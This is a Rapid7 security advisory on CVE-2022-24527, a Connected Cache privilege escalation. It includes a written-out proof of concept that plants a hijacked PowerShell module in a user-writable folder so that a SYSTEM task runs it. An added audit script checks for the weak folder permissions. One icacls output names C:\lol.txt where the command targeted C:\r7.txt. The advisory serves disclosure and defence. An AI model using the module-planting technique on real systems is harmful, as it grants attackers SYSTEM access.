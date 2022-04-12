
CVE-2022-24527: Microsoft Connected Cache Local Privilege Escalation (Fixed)

04/12/2022 | 01:22pm EDT
Last updated at Tue, 12 Apr 2022 17:15:25 GMT

On April 12, 2022, Microsoft published CVE-2022-24527, a local privilege escalation vulnerability in Microsoft Connected Cache. The vulnerability allowed a local low-privileged user to execute arbitrary PowerShell as SYSTEM due to improper file permission assignment (CWE-732).

Product description

Connected Cache is a feature used by Microsoft Endpoint Manager "Distribution Points" to support "Delivery Optimization."

Credit

This issue was discovered and reported by security researcher Jake Baines as part of Rapid7's vulnerability disclosure program.

Exploitation

When Connected Cache is in use on a Distribution Point, it is installed, in part, into C:\Doinc. Below, you can see that there are some PowerShell scripts within that directory:

C:\>dir /s /b C:\Doinc
C:\Doinc\Product
C:\Doinc\Product\Install
C:\Doinc\Product\Install\Logs
C:\Doinc\Product\Install\Tasks
C:\Doinc\Product\Install\Tasks\CacheNodeKeepAlive.ps1
C:\Doinc\Product\Install\Tasks\Maintenance.ps1
C:\Doinc\Product\Install\Tasks\SetDrivesToHealthy.ps1

Low-privileged users only have read and execute permissions on the PowerShell scripts.

C:\Doinc\Product\Install\Tasks>icacls *.ps1
CacheNodeKeepAlive.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                       NT AUTHORITY\NETWORK SERVICE:(I)(F)
                       BUILTIN\Administrators:(I)(F)
                       BUILTIN\Users:(I)(RX)

Maintenance.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                NT AUTHORITY\NETWORK SERVICE:(I)(F)
                BUILTIN\Administrators:(I)(F)
                BUILTIN\Users:(I)(RX)

SetDrivesToHealthy.ps1 NT AUTHORITY\SYSTEM:(I)(F)
                       NT AUTHORITY\NETWORK SERVICE:(I)(F)
                       BUILTIN\Administrators:(I)(F)
                       BUILTIN\Users:(I)(RX)

Successfully processed 3 files; Failed processing 0 files

The PowerShell scripts are executed every 60 seconds by the Task Scheduler as NT AUTHORITY\SYSTEM. All of that is fine. The following part is where the trouble begins. This is how SetDrivesToHealthy.ps1 starts:

try
{  
    import-module 'webAdministration'

    $error.clear()

When SetDrivesToHealthy.ps1 executes, it attempts to load the webAdministration module. Before searching the normal %PSModulePath% locations, SetDrivesToHealthy.ps1 looks for the module in C:\Doinc\Product\Install\Tasks\WindowsPowerShell\Modules\webAdministration. As we saw above, this directory doesn't exist. And while low-privileged users can't modify the Connected Cache PowerShell scripts, they do have sufficient privileges to add subdirectories and files to C:\Doinc\Product\Install\Tasks:

C:\Doinc\Product\Install>icacls ./Tasks/
./Tasks/ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
         NT AUTHORITY\NETWORK SERVICE:(I)(OI)(CI)(F)
         BUILTIN\Administrators:(I)(OI)(CI)(F)
         BUILTIN\Users:(I)(OI)(CI)(RX)
         BUILTIN\Users:(I)(CI)(AD)
         BUILTIN\Users:(I)(CI)(WD)
         CREATOR OWNER:(I)(OI)(CI)(IO)(F)

An attacker can create the necessary directory structure and place their own webAdministration module there so that SetDrivesToHealthy.ps1 will import it instead of the real one. In the proof of concept below, the low-privileged attacker creates the directory structure and a PowerShell module that creates the file C:\r7.txt.

C:\Doinc\Product\Install\Tasks>dir C:\
 Volume in drive C has no label.
 Volume Serial Number is 3073-81A6

 Directory of C:\

01/04/2022  05:01 PM    <DIR>          Doinc
01/04/2022  05:15 PM    <DIR>          DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022  03:48 PM    <DIR>          inetpub
07/07/2021  04:05 AM    <DIR>          PerfLogs
01/05/2022  09:29 AM    <DIR>          Program Files
01/05/2022  09:29 AM    <DIR>          Program Files (x86)
01/05/2022  09:16 AM    <DIR>          SCCMContentLib
01/05/2022  09:15 AM    <DIR>          SMSPKGC$
01/05/2022  09:17 AM    <DIR>          SMSSIG$
01/05/2022  09:17 AM    <DIR>          SMS_DP$
01/04/2022  05:04 PM    <DIR>          Users
01/04/2022  03:48 PM    <DIR>          Windows
               0 File(s)              0 bytes
              12 Dir(s)  239,837,327,360 bytes free

C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell

C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules

C:\Doinc\Product\Install\Tasks>mkdir WindowsPowerShell\Modules\webAdministration

C:\Doinc\Product\Install\Tasks>echo New-Item C:\r7.txt > WindowsPowerShell\Modules\webAdministration\webAdministration.psm1

C:\Doinc\Product\Install\Tasks>dir C:\
 Volume in drive C has no label.
 Volume Serial Number is 3073-81A6

 Directory of C:\

01/04/2022  05:01 PM    <DIR>          Doinc
01/04/2022  05:15 PM    <DIR>          DOINC-E77D08D0-5FEA-4315-8C95-10D359D59294
01/04/2022  03:48 PM    <DIR>          inetpub
01/05/2022  01:49 PM                 0 r7.txt
07/07/2021  04:05 AM    <DIR>          PerfLogs
01/05/2022  09:29 AM    <DIR>          Program Files
01/05/2022  09:29 AM    <DIR>          Program Files (x86)
01/05/2022  09:16 AM    <DIR>          SCCMContentLib
01/05/2022  09:15 AM    <DIR>          SMSPKGC$
01/05/2022  09:17 AM    <DIR>          SMSSIG$
01/05/2022  09:17 AM    <DIR>          SMS_DP$
01/04/2022  05:04 PM    <DIR>          Users
01/04/2022  03:48 PM    <DIR>          Windows
               1 File(s)              0 bytes
              12 Dir(s)  239,836,917,760 bytes free

C:\Doinc\Product\Install\Tasks>icacls C:\r7.txt
C:\lol.txt NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Administrators:(I)(F)
           BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Doinc\Product\Install\Tasks>

As you can see, the C:\r7.txt file is created, demonstrating the privilege escalation. The accompanying Process Monitor screenshot (not reproduced here) captures the planted PowerShell module being read in and the file being created by the SYSTEM user.
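The root cause above is a directory that SYSTEM loads modules from but that BUILTIN\Users can write into (the (CI)(AD) and (CI)(WD) entries). The following audit function is an added example, not code from the Rapid7 post or from Microsoft; it checks an unpatched host for that ACL condition and for the presence of the module directory an attacker would have to create. The path and the module name come from the advisory; the function name is a hypothetical one chosen here.

```powershell
# Added example (not from the advisory): audit the Connected Cache Tasks directory for
# (1) an Allow ACE granting BUILTIN\Users CreateFiles (WD) or CreateDirectories (AD), and
# (2) an existing WindowsPowerShell\Modules\webAdministration tree, which a legitimate
#     install does not have and which would indicate tampering on an unpatched host.
function Test-ConnectedCacheTasksDir {
    param(
        [string]$Path = 'C:\Doinc\Product\Install\Tasks'   # path from the advisory
    )
    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{
            Path = $Path; Exists = $false; UsersCanCreate = $false; HijackDirPresent = $false
        }
    }
    $acl = Get-Acl -LiteralPath $Path
    # CreateFiles == WriteData (WD) and CreateDirectories == AppendData (AD) on a directory
    $create = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
              [System.Security.AccessControl.FileSystemRights]::CreateDirectories
    $weak = @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference.Value -eq 'BUILTIN\Users' -and
        (($_.FileSystemRights -band $create) -ne 0)
    })
    # Import-Module searches next to the calling script before %PSModulePath%,
    # so this is the directory a planted module would have to live in.
    $hijack = Join-Path $Path 'WindowsPowerShell\Modules\webAdministration'
    [pscustomobject]@{
        Path             = $Path
        Exists           = $true
        UsersCanCreate   = ($weak.Count -gt 0)
        WeakAces         = $weak | ForEach-Object { "$($_.IdentityReference) $($_.FileSystemRights)" }
        HijackDirPresent = (Test-Path -LiteralPath $hijack)
        HijackPath       = $hijack
    }
}

# Run from an elevated or standard prompt on a Distribution Point; on a vulnerable
# install UsersCanCreate is $true. HijackDirPresent = $true warrants incident response.
Test-ConnectedCacheTasksDir | Format-List
```

The same check applies to any directory a SYSTEM scheduled task runs scripts from: pass it as -Path, since the advisory's hazard is the combination of user-writable directory and script-relative module lookup, not the Doinc path itself.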

Remediation

Follow Microsoft guidance on updating the Distribution Point software. If that is not possible, disabling the caching feature will effectively mitigate this issue.

Disclosure timeline

January 5, 2022: Issue disclosed to the vendor
January 5, 2022: Vendor acknowledgement
January 6, 2022: Vendor assigns a case identifier
January 10-11, 2022: Vendor and researcher discuss clarifying details
January 19, 2022: Vendor confirms the vulnerability
February-March 2022: Vendor and researcher coordinate on disclosure date and CVE assignment
April 12, 2022: Public disclosure (this document)

Additional reading:


Disclaimer

Rapid7 Inc. published this content on 12 April 2022 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 12 April 2022 17:21:08 UTC.


